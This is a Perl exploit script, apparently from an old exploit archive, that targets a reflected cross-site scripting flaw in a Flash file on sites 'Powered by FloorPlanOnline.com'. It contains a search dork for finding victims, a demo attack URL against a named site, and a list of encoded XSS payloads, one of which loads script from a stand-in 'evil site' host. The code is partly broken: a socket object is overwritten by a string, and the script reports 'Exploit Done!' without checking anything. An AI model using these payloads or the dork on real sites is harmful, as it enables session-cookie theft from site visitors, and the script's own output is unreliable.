[code:1:d7acacbdbc]#!/usr/local/bin/perl -w
use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;
my %options;
getopts('TeE', \%options) ;
my $test = $options{T};
my $encode = $options{e};
my $exploit = $options{E};
if ($test)
{
my @target = @ARGV;
if (@target == 0)
{
usage();
close;
}
my $files=('javascript:alert:document.cookie');
#--------------------------------------------------------------------------------
my $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAdr=>"@target",PeerPort=>"80") || die " [-] Target not found (!)\n\n";
$socket = ("@target$files");
print "[+] Connecting in @target .... \n\n ";
print "\n\n\r
[*]...Exploit Done!\n\n";
system "firefox $socket";
}
elsif($encode)
{
print "/-------------------------------------------------------------------------------------\
[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com
--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
print "
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Encoded XSS Injections @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
(1) Cookie --> javascript%3Aalert%3Adocument.cookie\n\n
(2) Inclusion of evil Script --> %3C%20script%20src=%20[http://www.you-evil-site/bad.js]%20%3E%3C/script%3E \n\n
(3) Image Inclusion --> %3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.image%5B0%5D.src%3D%22http%3A%2F%2F[your_site.com]%2F[image.jpg]%22%3B%3C%2Fscript%3E \n\n\n";
exit(1);
}
if($exploit)
{
print "/-------------------------------------------------------------------------------------\
[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com
--------------------------------------------------------------------------------------
[*]Can be exploited by malicious people to conduct cross-site scripting attacks.
-Input passed to the (URLPARAM) variable is not properly sanitised before
being returned to the user.
-This bug can be exploited to execute arbitrary script code in a user's browse
session in context of an affected site.
--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
exit(1);
}
else{
print "[-] Missing Argument (!) \n";
usage();
exit;
}
sub usage{
print"\n";
die <<EOF;
Usage $0: [-f# -S# -p# -l]
-T (Target) : test a defined target (url)
-e (encode) : give exemples of encoded XSS injection
-E (Exploit): to see my original exploit (avaible on Milw0rm )
-----------------------------------------------------------
Contact "kmkz" for more informations.
Mail: kmkz[at]live[dot]fr.
WebSite: http://kmkz-web-blog.blogspot.com
Board: www.collective-utopia.no-ip.fr
EOF
}[/code:1:d7acacbdbc]